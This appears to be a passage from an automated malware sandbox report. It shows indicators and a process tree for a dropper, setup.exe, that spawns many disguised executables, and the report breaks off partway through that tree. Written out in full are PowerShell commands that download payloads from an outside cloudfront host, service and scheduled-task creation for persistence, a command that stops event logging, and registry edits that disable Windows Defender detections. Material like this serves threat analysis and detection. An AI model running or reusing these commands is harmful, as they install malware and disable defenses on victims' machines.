SeIncBasePriorityPrivilege 6156 WMIC.exe Token: SeCreatePagefilePrivilege 6156 WMIC.exe Token: SeBackupPrivilege 6156 WMIC.exe Token: SeRestorePrivilege 6156 WMIC.exe Token: SeShutdownPrivilege 6156 WMIC.exe Token: SeDebugPrivilege 6156 WMIC.exe Token: SeSystemEnvironmentPrivilege 6156 WMIC.exe Token: SeRemoteShutdownPrivilege 6156 WMIC.exe Token: SeUndockPrivilege 6156 WMIC.exe Token: SeManageVolumePrivilege 6156 WMIC.exe Token: 33 6156 WMIC.exe Token: 34 6156 WMIC.exe Token: 35 6156 WMIC.exe Token: 36 6156 WMIC.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3384 dYxScN9MMZvzIWB3AkbI0aU0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3804 wrote to memory of 2648 3804 setup.exe 99 PID 3804 wrote to memory of 2648 3804 setup.exe 99 PID 3804 wrote to memory of 2568 3804 setup.exe 98 PID 3804 wrote to memory of 2568 3804 setup.exe 98 PID 3804 wrote to memory of 436 3804 setup.exe 101 PID 3804 wrote to memory of 436 3804 setup.exe 101 PID 3804 wrote to memory of 1016 3804 setup.exe 100 PID 3804 wrote to memory of 1016 3804 setup.exe 100 PID 3804 wrote to memory of 1016 3804 setup.exe 100 PID 3804 wrote to memory of 2084 3804 setup.exe 104 PID 3804 wrote to memory of 2084 3804 setup.exe 104 PID 3804 wrote to memory of 2084 3804 setup.exe 104 PID 3804 wrote to memory of 3684 3804 setup.exe 102 PID 3804 wrote to memory of 3684 3804 setup.exe 102 PID 3804 wrote to memory of 3684 3804 setup.exe 102 PID 3804 wrote to memory of 4524 3804 setup.exe 103 PID 3804 wrote to memory of 4524 3804 setup.exe 103 PID 3804 wrote to memory of 4524 3804 setup.exe 103 PID 3804 wrote to memory of 3648 3804 setup.exe 105 PID 3804 wrote to memory of 3648 3804 setup.exe 105 PID 3804 wrote to memory of 3648 3804 setup.exe 105 PID 3804 wrote to memory of 4836 3804 setup.exe 108 PID 3804 wrote to memory of 4836 3804 setup.exe 108 PID 3804 wrote to memory of 4836 3804 setup.exe 108 PID 3804 wrote to memory of 3996 3804 setup.exe 106 PID 3804 wrote to memory of 3996 3804 setup.exe 106 PID 3804 wrote to memory of 3996 3804 setup.exe 106 PID 3804 wrote to memory of 2476 3804 setup.exe 107 PID 3804 wrote to memory of 2476 3804 setup.exe 107 PID 3804 wrote to memory of 2476 3804 setup.exe 107 PID 3804 wrote to memory of 3384 3804 setup.exe 109 PID 3804 wrote to memory of 3384 3804 setup.exe 109 PID 3804 wrote to memory of 3384 3804 setup.exe 109 PID 3804 wrote to memory of 2960 3804 setup.exe 110 PID 3804 wrote to memory of 2960 3804 setup.exe 110 PID 3804 wrote to memory of 2960 3804 setup.exe 110 PID 3804 wrote to memory of 4800 3804 setup.exe 112 PID 3804 wrote to memory of 4800 3804 setup.exe 112 PID 3804 wrote to memory of 4800 3804 setup.exe 112 PID 3804 wrote to memory of 5088 3804 setup.exe 113 PID 3804 wrote to memory of 5088 3804 setup.exe 113 PID 3804 wrote to memory of 5088 3804 setup.exe 113 PID 3804 wrote to memory of 1280 3804 setup.exe 111 PID 3804 wrote to memory of 1280 3804 setup.exe 111 PID 3804 wrote to memory of 1280 3804 setup.exe 111 PID 3804 wrote to memory of 3940 3804 setup.exe 114 PID 3804 wrote to memory of 3940 3804 setup.exe 114 PID 3804 wrote to memory of 3940 3804 setup.exe 114 PID 2084 wrote to memory of 1588 2084 Mp8x5bobgjtqhrH0eLG6TG4R.exe 117 PID 2084 wrote to memory of 1588 2084 Mp8x5bobgjtqhrH0eLG6TG4R.exe 117 PID 2084 wrote to memory of 1588 2084 Mp8x5bobgjtqhrH0eLG6TG4R.exe 117 PID 2476 wrote to memory of 4124 2476 t3vA2ofLelWYvnTOYXinyNdK.exe 118 PID 2476 wrote to memory of 4124 2476 t3vA2ofLelWYvnTOYXinyNdK.exe 118 PID 2476 wrote to memory of 4124 2476 t3vA2ofLelWYvnTOYXinyNdK.exe 118 PID 3996 wrote to memory of 4408 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 155 PID 3996 wrote to memory of 4408 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 155 PID 3996 wrote to memory of 4408 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 155 PID 3996 wrote to memory of 3584 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 120 PID 3996 wrote to memory of 3584 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 120 PID 3996 wrote to memory of 3584 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 120 PID 3996 wrote to memory of 4420 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 121 PID 3996 wrote to memory of 4420 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 121 PID 3996 wrote to memory of 4420 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 121 PID 3996 wrote to memory of 1328 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Users\Admin\Documents\SimpleAdobe\QaJTEr3dmw7ln0GcExGbbGBX.exeC:\Users\Admin\Documents\SimpleAdobe\QaJTEr3dmw7ln0GcExGbbGBX.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2568 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:6612
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:6620
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:6628
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:6636
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
PID:6644
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
PID:6908
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:7088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
PID:7096
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\51HqerGWInGgiQEgyHhi5Ewi.exeC:\Users\Admin\Documents\SimpleAdobe\51HqerGWInGgiQEgyHhi5Ewi.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2648 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵PID:6228
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\m_9CDEY7PmIISiamjrGWjojo.exeC:\Users\Admin\Documents\SimpleAdobe\m_9CDEY7PmIISiamjrGWjojo.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4580
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\OHHcmC743LqiNfsmae4js_QK.exeC:\Users\Admin\Documents\SimpleAdobe\OHHcmC743LqiNfsmae4js_QK.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4880 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc77fbab58,0x7ffc77fbab68,0x7ffc77fbab784⤵PID:4424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1236,i,36638023195385491,1677329563754373394,131072 /prefetch:24⤵PID:5400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1236,i,36638023195385491,1677329563754373394,131072 /prefetch:84⤵PID:5416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2160 --field-trial-handle=1236,i,36638023195385491,1677329563754373394,131072 /prefetch:84⤵PID:5432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1236,i,36638023195385491,1677329563754373394,131072 /prefetch:14⤵PID:5608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1236,i,36638023195385491,1677329563754373394,131072 /prefetch:14⤵PID:5616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4104 --field-trial-handle=1236,i,36638023195385491,1677329563754373394,131072 /prefetch:14⤵PID:5740
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:620 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc77e646f8,0x7ffc77e64708,0x7ffc77e647184⤵PID:4496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:24⤵PID:1980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:14⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2900 /prefetch:14⤵PID:4408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3412 /prefetch:84⤵PID:2460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:14⤵PID:5780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:14⤵PID:6352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,9405376609420171971,11192823595958675285,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:14⤵PID:6360
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\7forErqq4tbW3RURgjjmm5tm.exeC:\Users\Admin\Documents\SimpleAdobe\7forErqq4tbW3RURgjjmm5tm.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 20163⤵
- Program crash
PID:6400
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\7fNSg2WKyZlCWuN1JzjiXiZP.exeC:\Users\Admin\Documents\SimpleAdobe\7fNSg2WKyZlCWuN1JzjiXiZP.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4524
-
-
C:\Users\Admin\Documents\SimpleAdobe\Mp8x5bobgjtqhrH0eLG6TG4R.exeC:\Users\Admin\Documents\SimpleAdobe\Mp8x5bobgjtqhrH0eLG6TG4R.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\is-K3KGQ.tmp\Mp8x5bobgjtqhrH0eLG6TG4R.tmp"C:\Users\Admin\AppData\Local\Temp\is-K3KGQ.tmp\Mp8x5bobgjtqhrH0eLG6TG4R.tmp" /SL5="$D0058,4107979,54272,C:\Users\Admin\Documents\SimpleAdobe\Mp8x5bobgjtqhrH0eLG6TG4R.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1588 -
C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe"C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe" -i4⤵
- Executes dropped EXE
PID:832
-
-
C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe"C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe" -s4⤵
- Executes dropped EXE
PID:4660
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\6IC7dyUGxyYC6aDNKgDSHQmp.exeC:\Users\Admin\Documents\SimpleAdobe\6IC7dyUGxyYC6aDNKgDSHQmp.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3648 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nswFC43.tmp\est.bat"3⤵PID:6132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6840
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\i1.exei1.exe /SUB=2838 /str=one4⤵
- Executes dropped EXE
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\u33c.0.exe"C:\Users\Admin\AppData\Local\Temp\u33c.0.exe"5⤵PID:5876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5876 -s 19846⤵
- Program crash
PID:4684
-
-
-
C:\Users\Admin\AppData\Local\Temp\u33c.1.exe"C:\Users\Admin\AppData\Local\Temp\u33c.1.exe"5⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵PID:6512
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 11685⤵
- Program crash
PID:7012
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:6652
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\LNB5cUXIMLWv2pLu3adb9Whf.exeC:\Users\Admin\Documents\SimpleAdobe\LNB5cUXIMLWv2pLu3adb9Whf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4408
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3584
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4420
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\t3vA2ofLelWYvnTOYXinyNdK.exeC:\Users\Admin\Documents\SimpleAdobe\t3vA2ofLelWYvnTOYXinyNdK.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\7zSF6C4.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\7zS3A5.tmp\Install.exe.\Install.exe /mGKCedidCE "525403" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:1172 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:4076
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:5836
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:5496
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:6508
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:6872
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:6980
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:5968
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:6688
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:6836
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:7092
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:6944
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:4608
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:6352
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:6644
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:5848
-
